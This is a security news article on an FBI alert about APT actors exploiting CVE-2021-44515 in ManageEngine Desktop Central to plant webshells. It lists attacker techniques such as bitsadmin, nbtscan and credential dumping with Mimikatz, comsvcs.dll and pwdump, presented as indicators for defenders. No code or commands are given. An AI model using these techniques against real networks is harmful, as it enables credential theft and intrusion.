FBI issued an alert revealing that APT actors have been actively exploiting a zero-day vulnerability – CVE-2021-44515 – on ManageEngine Desktop Central servers.
The APT actors compromised the Desktop Central servers to drop a webshell that overrides a genuine function of Desktop Central. “The actor then downloads post-exploitation tools, enumerating domain users and groups conducting network reconnaissance, attempts lateral movement, and dumps credentials. The CVE-2021-44515 has been rated critical by Zoho. It addresses an authentication bypass vulnerability in the software that allows an adversary to bypass authentication and execute arbitrary code on Desktop Central servers,” the FBI said.
🚨 NEW: CVE-2021-44515 🚨 Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10…. (click for more) Severity: CRITICAL https://t.co/oJBEt1StcT
— Threat Intel Center (@threatintelctr) December 16, 2021
- DLL sideloading
- Executing “live off the land” tools, e.g. bitsadmin
- Network scanning, e.g. nbtscan, nb.exe
- Powershell for command execution
- Persistence through Windows Service
- Downloading staged post-exploitation tools from other victim infrastructure
- Credential dumping, e.g. Mimikatz, comsvcs.dll, WDigest downgrade and pwdump
If organizations detect any activity related to these IOCs within their network, they are suggested to act immediately.
Zoho released a ManageEngine Desktop Central Security Advisory for the newly identified vulnerability CVE-2021-44515 on December 3, 2021.
In October 2021, the Cybersecurity and Infrastructure Security Agency (CISA) and FBI had warned about ongoing exploitation of the vulnerability in Zoho’s ManageEngine ServiceDesk Plus product. Tracked as CVE-2021-44077, the unauthenticated remote code execution vulnerability was known to affect all ServiceDesk Plus versions up to and including version 11305.
Webshell Attack on a Rise
Per Microsoft, webshells are pervasive and popular with attackers due to their effectiveness and simple code. “A webshell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions,” Microsoft said.
As a point of entry, the attackers install webshells on servers by exploiting security gaps, typically vulnerabilities in web applications and internet-facing servers. “These attackers scan the internet, often using public scanning interfaces like shodan.io, to locate servers to target. They may use previously fixed vulnerabilities that unfortunately remain unpatched in many servers, but they are also known to quickly take advantage of newly disclosed vulnerabilities,” explained Microsoft.
With these simple and hard-to-detect attack vectors, the security gaps continue to be exploited for months and are only discovered when they have more than made their presence felt.